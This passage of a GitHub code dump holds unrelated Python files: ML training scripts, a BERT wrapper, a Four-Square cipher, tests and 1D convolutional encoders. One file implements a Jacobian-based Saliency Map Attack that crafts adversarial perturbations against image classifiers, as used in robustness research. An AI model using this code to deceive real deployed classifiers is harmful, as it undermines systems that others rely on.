Spider/Login_try/code/Patent_login_old.py","file_name":"Patent_login_old.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24161454811","text":"import random\n\nimport pandas as pd\nfrom rake_nltk import Rake\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef recommend(caption):\n df = pd.read_csv(\"./diaries/views/flower.csv\")\n captioned_st = caption\n r = Rake()\n\n new_data = {\n \"f_name\": captioned_st,\n \"f_color\": \"n\",\n \"f_language\": captioned_st,\n \"f_property\": \"n\",\n }\n df = df.append(new_data, ignore_index=True)\n df[\"Key_words\"] = \"\"\n for _, row in df.iterrows():\n r.extract_keywords_from_text(row[\"f_language\"])\n key_words_dict_scores = r.get_word_degrees()\n row[\"Key_words\"] = list(key_words_dict_scores.keys())\n for _, row in df.iterrows():\n row[\"f_color\"] = [x.lower().replace(\" \", \"\") for x in row[\"f_color\"]]\n row[\"f_property\"] = [x.lower().replace(\" \", \"\") for x in row[\"f_property\"]]\n\n df[\"Merge_of_words\"] = \"\"\n columns = [\"f_color\", \"f_property\", \"Key_words\"]\n for _, row in df.iterrows():\n words = \"\"\n for col in columns:\n words += \" \".join(row[col]) + \" \"\n row[\"Merge_of_words\"] = words\n df = df[[\"f_name\", \"Merge_of_words\"]]\n\n count = CountVectorizer()\n count_matrix = count.fit_transform(df[\"Merge_of_words\"])\n cosine_sim = cosine_similarity(count_matrix, count_matrix)\n indices = pd.Series(df[\"f_name\"])\n recommended_flower = []\n idx = indices[indices == captioned_st].index[0]\n score_series = pd.Series(cosine_sim[idx]).sort_values(ascending=False)\n top_indices = list(score_series.iloc[1:2].index)\n rv=random.choice(top_indices)\n recommended_flower.append(list(df['f_name'])[rv])\n \n flower_num = df.index[df[\"f_name\"] == recommended_flower[0]].tolist()[0]\n if flower_num == 1:\n flower_num = random.choice(range(23))\n return flower_num\n\n","repo_name":"minicks/FlowerDiary","sub_path":"backend/diaries/views/recommend_flower.py","file_name":"recommend_flower.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21526642772","text":"import numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.utils import np_utils\n# The scikit-learn wrappers let us apply GridSearch to Keras\nfrom keras.wrappers.scikit_learn import KerasClassifier \nfrom sklearn.model_selection import GridSearchCV\n\n\n########################################\n###### DATA PREPROCESSING ##############\n########################################\n\n# load ascii text and convert to lowercase\nfilename = \"/home/trofficus/Desktop/twitter_project/Conocimiento/alice.txt\"\nraw_text = open(filename).read()\nraw_text = raw_text.lower()\n# create mapping of unique chars to integers\nchars = sorted(list(set(raw_text)))\nchar_to_int = dict((c, i) for i, c in enumerate(chars))\n# summarize the loaded data\nn_chars = len(raw_text)\nn_vocab = len(chars)\n# prepare the dataset of input to output pairs encoded as integers\nseq_length = 100\ndataX = []\ndataY = []\nfor i in range(0, n_chars - seq_length, 1):\n\tseq_in = raw_text[i:i + seq_length]\n\tseq_out = raw_text[i + seq_length]\n\tdataX.append([char_to_int[char] for char in 
seq_in])\n\tdataY.append(char_to_int[seq_out])\nn_patterns = len(dataX)\n# reshape X to be [samples, time steps, features]\nX = numpy.reshape(dataX, (n_patterns, seq_length, 1))\n# normalize\nX = X / float(n_vocab)\n# one hot encode the output variable\ny = np_utils.to_categorical(dataY)\n\n\n#############################################\n##### MODELING WITH LSTM (2 Layers) #########\n#############################################\n\n\n# We create a function to apply GridSearch\n\ndef model_generator(units, dropout, optimizer, activations):\n\tmodel = Sequential()\n\tmodel.add(LSTM(units, input_shape=(X.shape[1], X.shape[2]),\n\t\t\t\t\t\t activation=activations, return_sequences=True))\n\tmodel.add(Dropout(dropout))\n\tmodel.add(LSTM(units, activation = activations, return_sequences=True))\n\tmodel.add(Dropout(dropout))\n\tmodel.add(Dense(y.shape[1], activation='softmax'))\n\t\n\tmodel.compile(loss=\"categorical_crossentropy\", optimizer=optimizer,\n\t\t\t\t metrics=[\"accuracy\"])\n\treturn model\n\n\n# Let's set a collection of hyperparameters\n\nepochs = [20, 50, 100]\nbatch_size = [30, 60, 100]\nunits = [128, 256, 512]\nactivations = [\"relu\", \"tanh\", \"elu\"]\ndropout = [0.2, 0.3, 0.4]\noptimizer = [\"RMSprop\", \"Adam\"]\n\n\nparam_grid = dict(batch_size=batch_size, epochs=epochs, units=units, \n\t\t\t\t activations=activations, dropout=dropout,\n\t\t\t\t optimizer=optimizer)\n\nmodel = KerasClassifier(build_fn=model_generator, verbose=1)\n\ngrid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1, verbose=1)\ngrid_result = grid.fit(X, y)\n\nbest_score = grid_result.best_score_\nbest_params = grid_result.best_params_\n\nprint(\"The best model has a score (Categorical crossentropy) of %f using this number of epochs: %s\" %(best_score, best_params))\n\n# Write the results to a file\n\nwith open(\"results.txt\", \"w\") as f:\n\tf.write(str(best_score))\n\tf.write(str(best_params))\n","repo_name":"MTrofficus/TheArtificialJesus","sub_path":"python_scripts/alice_lstm_2l.py","file_name":"alice_lstm_2l.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28874883495","text":"import tensorflow as tf\nimport numpy as np\n\nfrom adversarial_interface import AdversarialAttack\n\n\nclass JSMA(AdversarialAttack):\n\n    def __init__(self, X, Y, channels, eps, model, clip_min=0.0, clip_max=1.0):\n        super().__init__(eps, model)\n\n        self.img_rows, self.img_cols = X, Y\n        self.channels = channels\n\n        self.clip_min = clip_min\n        self.clip_max = clip_max\n\n        self.name = \"Jacobian-based Saliency Map Attack\"\n\n    def __get_logits(self):\n        self._model.layers[-1].activation = None\n\n    def __compute_jacobian_matrix(self, input_image, target_image, y_inidx, y_tidx):\n        self.__get_logits()\n\n        logits = self._model(input_image)\n\n        logits = np.array(tf.reshape(logits, (-1,)))\n        logidx, logidx_target = logits[y_inidx], logits[y_tidx]\n\n        jacobian, jacobian_target = np.gradient(input_image.ravel(), logidx), \\\n                                    np.gradient(target_image.ravel(), logidx_target)\n\n        return tf.cast(jacobian.reshape((1, self.img_cols, self.img_rows, self.channels)), tf.float32), \\\n               tf.cast(jacobian_target.reshape((1, self.img_cols, self.img_rows, self.channels)), tf.float32)\n\n    def __compute_saliency_map(self, input_image, dF_tX, dF_jX):\n        # compute saliency map with respect to jacobian\n        c1, c2 = tf.logical_or(self.eps < 0, input_image < self.clip_max), \\\n                 tf.logical_or(self.eps > 0, input_image > 
self.clip_min)\n\n sal1 = dF_tX >= 0\n sal2 = dF_jX <= 0\n\n shape = input_image.ravel().shape[0]\n\n condition = tf.cast(tf.reduce_all([c1, c2, sal1, sal2], axis=0), dtype=tf.float32)\n score_sm = condition * (dF_tX * tf.abs(dF_jX))\n\n score_sm = tf.reshape(score_sm, shape=[1, shape])\n return score_sm\n\n def adversarial_pattern(self, input_image, **kwargs):\n # generate adversarial perturbations\n max_iter, target_image, y_inidx, y_tidx = kwargs.get(\"max_iter\"), kwargs.get(\"target_image\"),\\\n kwargs.get(\"y_inidx\"), kwargs.get(\"y_tidx\")\n perturbations = []\n\n jacobian_input, jacobian_target = self.__compute_jacobian_matrix(input_image, target_image, y_inidx, y_tidx)\n jacobian_adv = jacobian_input - jacobian_target\n\n saliency_score = self.__compute_saliency_map(input_image, jacobian_target, jacobian_adv)\n shape = input_image.ravel().shape[0]\n update_map = np.ones((1, shape), dtype=np.float32)\n\n i = 0\n while i < max_iter:\n # self.eps = np.random.uniform(0.01, 2.5)\n idx = tf.argmax(saliency_score, axis=1)\n update_map[:, int(idx)] = 0.0\n update_map = tf.constant(update_map, dtype=tf.float32)\n saliency_score = saliency_score * update_map\n\n update_map = np.array(update_map, dtype=np.float32)\n perturbation = tf.one_hot(idx, shape, on_value=self.eps, off_value=0.0)\n perturbation = tf.reshape(perturbation, shape=tf.shape(input_image))\n\n perturbations.append(perturbation)\n i += 1\n\n pert_sum = tf.zeros((1, self.img_cols, self.img_rows, self.channels), dtype=tf.float32)\n for pert in perturbations:\n pert_sum += pert\n\n adversarial_image = tf.clip_by_value(tf.stop_gradient(input_image + pert_sum), self.clip_min, self.clip_max)\n\n return np.array(adversarial_image), np.array(pert_sum)\n","repo_name":"Dimanssional/Adversial-Attacks-Methods","sub_path":"Adversarial_Algorithms/jsma_method.py","file_name":"jsma_method.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13774805145","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n@ide: PyCharm\n@author: mesie\n@date: 2022/6/14 2:13 PM\n@summary: Bert model\n\"\"\"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional\nfrom transformers import BertForSequenceClassification\n\nclass BertModel(nn.Module):\n    def __init__(self, model_path='bert-base-chinese'):\n        super(BertModel, self).__init__()\n        self.bert = BertForSequenceClassification.from_pretrained(model_path, num_labels=2) # /bert_pretrain/\n        self.device = torch.device(\"cuda\")\n        for param in self.bert.parameters():\n            param.requires_grad = True # every parameter requires a gradient\n\n    def forward(self, batch_seqs, batch_seq_masks, batch_seq_segments, labels):\n        loss, logits = self.bert(input_ids=batch_seqs, attention_mask=batch_seq_masks,\n                                 token_type_ids=batch_seq_segments, labels=labels)\n        probabilities = functional.softmax(logits, dim=-1)\n        return loss, logits, probabilities","repo_name":"littlemesie/text_match","sub_path":"models/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23958504930","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import host_subplot\nimport mpl_toolkits.axisartist as AA\nimport numpy as np\n\nax = host_subplot(111, axes_class=AA.Axes)\n\n# x axis\nini = 0\nfin = 16\nl = np.linspace(ini, fin, num=1e5)\n# figure\n#fig = plt.figure(edgecolor='w', facecolor='w', figsize=[20,5])\n\nwith 
plt.style.context('fivethirtyeight'):\n ax.plot(l, np.sin(l**2), lw=2, color='b')\n \nxlab = (r'$10^{6}$', r'$10^{4}$', r'$10^{2}$', r'$10^{0}$', r'$10^{-2}$', r'$10^{-4}$',\n r'$10^{-6}$', r'$10^{-8}$', r'$10^{-10}$', r'$10^{-12}$', r'$10^{-14}$')\nn = len(xlab)\nmed = float((fin-ini))/n\nloclab = [med/2]\nfor i in range(1,n):\n loclab.append(med/2 + i*med)\nplt.xticks(loclab, xlab)\nylim = [-1.25, 1.25]\nplt.ylim(ylim)\nplt.xlim([ini, fin])\nplt.yticks([0], ('0'))\nplt.tick_params(labelsize=20)\nplt.axes().set_axis_bgcolor('w')\nplt.grid('off', axis='y')\nplt.box('off'), \n#plt.title('Electromagnetic spectrum'.decode('utf-8'), fontsize=22) \n\nax2 = ax.twin() # ax2 is responsible for \"top\" axis and \"right\" axis\nax2.set_xticks([0., .5*np.pi, np.pi, 1.5*np.pi, 2*np.pi])\nax2.set_xticklabels([\"text\", r\"$\\frac{1}{2}\\pi$\",\n r\"$\\pi$\", r\"$\\frac{3}{2}\\pi$\", r\"$2\\pi$\"])\n\nax2.axis[\"right\"].major_ticklabels.set_visible(False)\n\n\n#plt.draw()\n#plt.show()\n","repo_name":"pap84/cim","sub_path":"rst/source/figures/cap2/fig1_bandas/bandas_3.py","file_name":"bandas_3.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75147845584","text":"#!/usr/bin/env python3\nimport ciphers\nimport polybius\nimport os\n\nclass FourSquare(ciphers.Cipher):\n\tdef __init__(self, key1, key2, plaintext=\"\", ciphertext=\"\"):\n\t\tplaintext = plaintext.replace(\"J\", \"I\")\n\t\tsuper().__init__(plaintext, ciphertext)\n\t\t\n\t\tself._legal_chars.pop(self._legal_chars.index(\"J\"))\n\n\t\tif self._valid_values([self.plaintext, self.ciphertext, key1, key2], self._legal_chars):\n\t\t\traise ciphers.IllegalCharsError(\"Either the plaintext or ciphertext has illegal chars.\\nLegal chars: {}\".format(\"\".join(self._legal_chars)))\n\n\t\t#key1 used in top right square, key2 bottom left square\n\t\tself.key1 = key1\n\t\tself.key2 = key2\n\t\t\n\t\tself.ciphertext_squares = []\n\t\tself.plaintext_square = []\n\t\tself.plaintext_square_reverse = []\n\t\tself._create_squares()\n\t\tself._reverse_ciphertext_squares()\n\n\tdef encrypt(self):\n\t\t#repeats the last char of plaintext if not an even length\n\t\tself.plaintext += self.plaintext[len(self.plaintext) - 1] if len(self.plaintext) % 2 != 0 else \"\"\n\t\tself.ciphertext = \"\"\n\n\t\tfor i in range(2, len(self.plaintext) + 1, 2):\n\t\t\tpair = self.plaintext[i - 2:i]\n\t\t\tpair = [self.plaintext_square[pair[0]], self.plaintext_square[pair[1]]]\n\t\t\tcipher_pair = [str(pair[0][0]) + str(pair[1][1]), str(pair[1][0]) + str(pair[0][1])]\n\t\t\tcipher_pair = self.ciphertext_squares_reverse[0][cipher_pair[0]] + self.ciphertext_squares_reverse[1][cipher_pair[1]]\n\t\t\tself.ciphertext += cipher_pair\n\t\treturn self.ciphertext\n\n\tdef decrypt(self):\n\t\tself.ciphertext += self.ciphertext[len(self.ciphertext) - 1] if len(self.ciphertext) % 2 != 0 else \"\"\n\t\tself.plaintext = \"\"\n\n\t\tfor i in range(2, len(self.ciphertext) + 1, 2):\n\t\t\tcipher_pair = self.ciphertext[i - 2: i]\n\t\t\tcipher_pair = [self.ciphertext_squares[0][cipher_pair[0]], self.ciphertext_squares[1][cipher_pair[1]]]\n\t\t\tpair = [str(cipher_pair[0][0]) + str(cipher_pair[1][1]), str(cipher_pair[1][0]) + str(cipher_pair[0][1])]\n\t\t\tpair = self.plaintext_square_reverse[pair[0]] + self.plaintext_square_reverse[pair[1]]\n\t\t\tself.plaintext += pair\n\t\treturn self.plaintext\n\n\tdef _reverse_ciphertext_squares(self):\n\t\tself.ciphertext_squares_reverse = [{}, {}]\n\n\t\tfor i 
in self.ciphertext_squares[0]:\n\t\t\tself.ciphertext_squares_reverse[0][self.ciphertext_squares[0][i]] = i\n\t\tfor i in self.ciphertext_squares[1]:\n\t\t\tself.ciphertext_squares_reverse[1][self.ciphertext_squares[1][i]] = i\n\n\tdef _create_squares(self):\n\t\t'''creates four 5x5 squares, one plaintext, two ciphertext,\n\t\talthough two plaintext squares are used in FourSquare, one will suffice.'''\n\t\t#creates plaintext square\n\t\taxis = [x for x in range(5)]\n\t\tsqr = polybius.PolybiusSquare(x_values=axis, y_values=axis, sqr_values=self._legal_chars)\n\t\tsqr.create_square()\n\t\tself.plaintext_square = sqr.square\n\t\tself.plaintext_square_reverse = {self.plaintext_square[x]:x for x in self.plaintext_square}\n\n\t\t#exits method if ciphertext squares have been provided\n\t\tif self.ciphertext_squares: return None\n\n\t\tsqr_values_1 = list(self.key1)\n\t\tsqr_values_1.extend(self._legal_chars)\n\t\tsqr_values_1 = self._remove_duplicates(sqr_values_1)\n\n\t\tsqr_values_2 = list(self.key2)\n\t\tsqr_values_2.extend(self._legal_chars)\n\t\tsqr_values_2 = self._remove_duplicates(sqr_values_2)\n\n\t\t#if an empty dict isn't passed for square, it misbehaves (Python's mutable default argument gotcha) - the instance variable\n\t\t#'square' acts like a class variable, or as if it's static: when the method create_square is called\n\t\t#it changes the value of the instance variable for every instance of the class PolybiusSquare.\n\t\tsqr1 = polybius.PolybiusSquare(x_values=axis, y_values=axis, sqr_values=sqr_values_1, square={})\n\t\tsqr1.create_square()\n\t\tself.ciphertext_squares.append(sqr1.square)\n\t\tsqr2 = polybius.PolybiusSquare(x_values=axis, y_values=axis, sqr_values=sqr_values_2, square={})\n\t\tsqr2.create_square()\n\t\tself.ciphertext_squares.append(sqr2.square)\n\n\tdef _remove_duplicates(self, x):\n\t\t'''returns a list with any duplicates removed'''\n\t\tin_list = []\n\t\tno_dupls = []\n\n\t\tfor i in range(len(x)):\n\t\t\ttry:\n\t\t\t\tif no_dupls.index(x[i]):\n\t\t\t\t\tpass\n\t\t\texcept ValueError:\n\t\t\t\tno_dupls.append(x[i])\n\t\t\t\tin_list.append(x[i])\n\n\t\treturn no_dupls\n\nif __name__ == '__main__':\n\tos.system(\"clear\")\n\tf = FourSquare(\"EXAMPLE\", \"KEYWORD\", ciphertext=\"TWSP\")\n\t#f.encrypt()\n\tf.decrypt()\n\tprint(f.plaintext)","repo_name":"murster972/ClassicalCiphers","sub_path":"four_square.py","file_name":"four_square.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34134048628","text":"import pytest\nfrom unittest.mock import patch\nfrom nail.tools.debug_file import debug_file\n\n# Test data\nTEST_PROMPT = \"Fix any bugs in the file.\"\nTEST_MODIFIED_CONTENT = \"def test_function():\\n    return 43\\n\"\n\n\n@pytest.fixture\ndef MockFileEditor():\n    with patch(\"nail.tools.debug_file.FileEditor\", autospec=True) as mock:\n        yield mock\n\n\n@pytest.fixture\ndef MockChat():\n    with patch(\"nail.tools.debug_file.Chat\", autospec=True) as mock:\n        mock_chat = mock.return_value\n        mock_chat.predict_code.return_value = TEST_MODIFIED_CONTENT\n        yield mock\n\n\n@pytest.fixture\ndef MockPrompt():\n    with patch(\"nail.tools.debug_file.DebugPrompt\", autospec=True) as mock:\n        mock_prompt = mock.return_value\n        mock_prompt.text.return_value = TEST_PROMPT\n        yield mock\n\n\n@pytest.mark.parametrize(\"error_message\", [None, \"error message\"])\ndef 
test_debug_file(MockFileEditor, MockChat, MockPrompt, error_message):\n mock_file_editor = MockFileEditor.return_value\n\n debug_file(\"test_file.py\", error_message)\n\n mock_file_editor.apply_changes.assert_called_once_with(TEST_MODIFIED_CONTENT)\n","repo_name":"edsaav/nail","sub_path":"tests/tools/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"213990666","text":"class Protain:\n    def __init__(self):\n        self.constant_1 = 1.5\n        self.constant_2 = 0.8\n\n    def calc_protain(self, weight, y):\n        \"\"\"\n        This method calculates the needed protein based on the person's weight\n        :param weight: the person's weight\n        :param y: the goal selector (1 or 2) that picks the protein factor\n        :return: the needed protein for the given weight\n        \"\"\"\n        protain_you_need = 0\n        if y == 1:\n            protain_you_need += (weight * self.constant_1)\n        elif y == 2:\n            protain_you_need += (weight * self.constant_2)\n\n        return protain_you_need\n","repo_name":"mukhtarabdelsalam/exam_project_nice_body","sub_path":"Protain.py","file_name":"Protain.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32004265482","text":"from collections import OrderedDict\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\n\n# ------------------------------------------------------------------------------\n# ConvNext1D Components\n# ------------------------------------------------------------------------------\nclass GlobalResponseNormalization(nn.Module):\n    \"\"\"\n    Adapted from https://github.com/facebookresearch/ConvNeXt-V2\n\n    Inputs are expected to be of shape (batch_size, channels, spatial_dim),\n    just as with conv1d layers.\n    \"\"\"\n\n    def __init__(self, dim):\n        super(GlobalResponseNormalization, self).__init__()\n        self.gamma = nn.Parameter(torch.zeros(1, dim, 1))\n        self.beta = nn.Parameter(torch.zeros(1, dim, 1))\n\n    def forward(self, x):\n        # norm along spatial dimension then divide\n        # that by mean along channel dimension\n        Gx = torch.norm(x, p=2, dim=2, keepdim=True)\n        Nx = Gx / (Gx.mean(dim=1, keepdim=True) + 1e-5)\n\n        return self.gamma * x * Nx + self.beta + x\n\n\nclass DepthWiseConv1D(nn.Module):\n    \"\"\"\n    Depthwise convolution is grouped convolution where the number of groups\n    is equal to the number of input channels. 
This is equivalent to applying\n a different kernel to each channel.\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size):\n super(DepthWiseConv1D, self).__init__()\n self.depthwise = nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n groups=in_channels,\n padding=\"same\",\n )\n\n def forward(self, x):\n return self.depthwise(x)\n\n\nclass PointWiseConv1D(nn.Module):\n \"\"\"\n Pointwise convolution is a 1x1 convolution that is used to change the number\n of channels in a feature map.\n \"\"\"\n\n def __init__(self, in_channels, out_channels):\n super(PointWiseConv1D, self).__init__()\n self.pointwise = nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n )\n\n def forward(self, x):\n return self.pointwise(x)\n\n\nclass DownsampleConv1D(nn.Module):\n \"\"\"\n Downsampling applies a convolution with a large stride to reduce the\n spatial dimension of the input.\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size=2):\n super(DownsampleConv1D, self).__init__()\n\n self.block = nn.Sequential(\n nn.GroupNorm(1, in_channels),\n nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=kernel_size,\n ),\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass ConvNext1DStem(nn.Module):\n \"\"\"\n Input stage of cnn that applies a downsample convolution followed by normalization.\n \"\"\"\n\n def __init__(\n self, in_channels=1, out_channels=32, in_kernel=7, downsample_kernel=4\n ):\n super(ConvNext1DStem, self).__init__()\n self.stem = nn.Sequential(\n nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=in_kernel,\n stride=1,\n padding=\"valid\",\n ),\n nn.GroupNorm(1, out_channels),\n nn.Conv1d(\n in_channels=out_channels,\n out_channels=out_channels,\n kernel_size=downsample_kernel,\n stride=downsample_kernel,\n ),\n nn.GroupNorm(1, out_channels),\n )\n\n def forward(self, x):\n return self.stem(x)\n\n\nclass ConvNext1DBlock(nn.Module):\n \"\"\"\n Main block of a ConvNext1D network. This block uses the inverted bottleneck\n configuration with skip connection and stochastic depth.\n \"\"\"\n\n def __init__(\n self,\n channels,\n kernel_size=7,\n bottleneck_factor=2,\n stride=1,\n stochastic_depth=0.1,\n ):\n super(ConvNext1DBlock, self).__init__()\n self.stochastic_depth = stochastic_depth\n\n self.block = nn.Sequential(\n DepthWiseConv1D(\n in_channels=channels,\n out_channels=channels,\n kernel_size=kernel_size,\n ),\n nn.GroupNorm(1, channels),\n PointWiseConv1D(\n in_channels=channels,\n out_channels=channels * bottleneck_factor,\n ),\n nn.GELU(),\n GlobalResponseNormalization(channels * bottleneck_factor),\n PointWiseConv1D(\n in_channels=channels * bottleneck_factor,\n out_channels=channels,\n ),\n )\n\n def forward(self, x):\n \"\"\"\n Forward pass of ConvNext1D with skip connection and stochastic depth\n (when training). 
Use the block path with probability {stochastic_depth}\n otherwise use just the identity path.\n \"\"\"\n # if self.training:\n # if np.random.rand() <= self.stochastic_depth:\n # return x\n # else:\n # return self.block(x) + x\n # else:\n # return self.block(x) + x\n return self.block(x) + x\n\n\nclass ConvNext1DStage(nn.Module):\n \"\"\"\n Stage of ConvNext1D that applies a downsample (if specified)\n followed by n_blocks X ConvNext1DBlock.\n \"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n block_kernel_size=7,\n downsample_kernel_size: int | None = 2,\n n_blocks=3,\n bottleneck_factor=2,\n stochastic_depth=0.1,\n ):\n super(ConvNext1DStage, self).__init__()\n self.blocks = nn.Sequential()\n if downsample_kernel_size:\n self.blocks.append(\n DownsampleConv1D(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=downsample_kernel_size,\n )\n )\n self.blocks.append(\n nn.Sequential(\n *[\n ConvNext1DBlock(\n channels=out_channels,\n kernel_size=block_kernel_size,\n bottleneck_factor=bottleneck_factor,\n stochastic_depth=stochastic_depth,\n )\n for _ in range(n_blocks - 1)\n ],\n ConvNext1DBlock(\n channels=out_channels,\n kernel_size=block_kernel_size,\n bottleneck_factor=bottleneck_factor,\n stochastic_depth=0.0,\n ),\n )\n )\n\n def forward(self, x):\n return self.blocks(x)\n\n\nclass ConvNext1DEncoder(pl.LightningModule):\n def __init__(\n self,\n stem_kernel: int = 4,\n downsample_kernel: int = 2,\n block_kernel: int = 7,\n block_dims: list[int] = [128, 256, 512],\n n_blocks: list[int] = [2, 4, 2],\n stochastic_depths: list[float] = [0.25, 0.5, 0.25],\n ):\n \"\"\"\n Initialize the ConvNext1D encoder\n Params:\n stem_kernel: kernel size for the stem convolution\n downsample_kernel: kernel size for the downsample convolution; if None, then\n the stage will not downsample (e.g. in the first stage)\n block_kernel: kernel size for the ConvNext1DBlock depthwise convolution\n block_dims: List of dimensions for each stage.\n Last element is the encoder dimension.\n n_blocks: List of number of blocks for each stage\n stochastic_depths: List of stochastic depth values for each stage\n \"\"\"\n super(ConvNext1DEncoder, self).__init__()\n assert (\n len(block_dims) == len(n_blocks) == len(stochastic_depths)\n ), \"block_dims, n_blocks, and stochastic_depths must be the same length\"\n\n self.enc_dimension = block_dims[-1]\n\n # stem and first stage ----------------------------\n self.blocks = nn.Sequential(\n ConvNext1DStem(\n in_channels=1,\n out_channels=block_dims[0],\n in_kernel=stem_kernel,\n downsample_kernel=downsample_kernel,\n ),\n )\n self.blocks.append(\n ConvNext1DStage(\n in_channels=block_dims[0],\n out_channels=block_dims[0],\n block_kernel_size=block_kernel,\n downsample_kernel_size=None,\n n_blocks=n_blocks[0],\n stochastic_depth=stochastic_depths[0],\n )\n )\n\n # remaining stages --------------------------------\n for i in range(1, len(block_dims)):\n self.blocks.append(\n ConvNext1DStage(\n in_channels=block_dims[i - 1],\n out_channels=block_dims[i],\n block_kernel_size=block_kernel,\n downsample_kernel_size=downsample_kernel,\n n_blocks=n_blocks[i],\n stochastic_depth=stochastic_depths[i],\n )\n )\n\n # to embedding ------------------------------------\n self.blocks.append(\n nn.Sequential(\n nn.AdaptiveAvgPool1d(1),\n nn.GroupNorm(1, block_dims[-1]),\n nn.Flatten(start_dim=1),\n # TODO test without the linear output layer\n nn.Linear(block_dims[-1], block_dims[-1]),\n )\n )\n\n self.apply(self._init_weights)\n\n def forward(self, x):\n 
return self.blocks(x)\n\n def predict_step(self, batch, _):\n return self.forward(batch[\"P\"])\n\n def _init_weights(self, m, w_init=nn.init.trunc_normal_, b_init=nn.init.zeros_):\n \"\"\"\n The default init for pytorch seems to cause the beginning of training\n to be a bit suboptimal (uses Xavier?).\n \"\"\"\n if isinstance(m, nn.Conv1d):\n w_init(m.weight)\n if m.bias is not None:\n b_init(m.bias)\n\n\n# ------------------------------------------------------------------------------\n# regular convolutional network blocks\n# ------------------------------------------------------------------------------\nclass Conv1DBlock(nn.Module):\n \"\"\"Regular convolution with no skip connection\"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n dropout=0.1,\n kernel_size=3,\n stride=1,\n padding=\"valid\",\n ):\n super(Conv1DBlock, self).__init__()\n self.conv = nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n )\n self.dropout = nn.Dropout(dropout)\n # self.norm = nn.GroupNorm(1, out_channels)\n self.norm = nn.BatchNorm1d(out_channels)\n self.act = nn.GELU()\n self.pool = nn.MaxPool1d(kernel_size=3, stride=1)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.dropout(x)\n x = self.norm(x)\n x = self.act(x)\n x = self.pool(x)\n return x\n\n\nclass Conv1DEncoder(pl.LightningModule):\n \"\"\"\n Conv 1d model that takes in a sequence of genotypes (sparse with positional\n channel) and outputs an encoded N-dimensional vector representation.\n \"\"\"\n\n def __init__(\n self,\n in_channels=1,\n kernel_size=3,\n stride=1,\n n_layers=4,\n dropout=0.1,\n padding=\"valid\",\n enc_dimension=512,\n ):\n super().__init__()\n\n self.in_channels = in_channels\n self.enc_dimension = n_layers * 32\n self.kernel_size = kernel_size\n self.stride = stride\n self.n_layers = n_layers\n self.dropout = dropout\n self.padding = padding\n self.enc_dimension = enc_dimension\n\n self.conv_in = nn.Conv1d(\n in_channels=in_channels,\n out_channels=32,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n )\n\n self.conv_blocks = nn.ModuleList(\n [\n Conv1DBlock(\n in_channels=32 * i,\n out_channels=(i + 1) * 32,\n dropout=dropout,\n kernel_size=kernel_size,\n stride=stride,\n # padding=padding,\n )\n for i in range(1, n_layers)\n ]\n )\n\n # used to flatten the output of the conv blocks\n # TODO just use this as the output encoding and see what happens\n self.avg_pool = nn.AdaptiveAvgPool1d(1)\n\n self.fc = nn.Linear(n_layers * 32, enc_dimension)\n self.fc_dropout = nn.Dropout(dropout)\n\n self.apply(self._init_weights)\n\n def forward(self, x):\n x = self.conv_in(x)\n for block in self.conv_blocks:\n x = block(x)\n x = self.avg_pool(x).squeeze(2)\n x = self.fc(x)\n x = self.fc_dropout(x)\n return x\n\n def predict_step(self, batch, _):\n return self.forward(batch[\"P\"])\n\n def _init_weights(self, m, w_init=nn.init.trunc_normal_, b_init=nn.init.zeros_):\n \"\"\"\n The default init for pytorch seems to cause the beginning of training\n to be a bit suboptimal (uses Xavier?).\n \"\"\"\n if isinstance(m, nn.Conv1d):\n w_init(m.weight)\n if m.bias is not None:\n b_init(m.bias)\n\n\nencoder_factory = {\n \"conv1d\": Conv1DEncoder,\n \"ConvNext\": ConvNext1DEncoder,\n}\n\n# ------------------------------------------------------------------------------\n# Main siamese network that uses a generic encoder backbone\n# 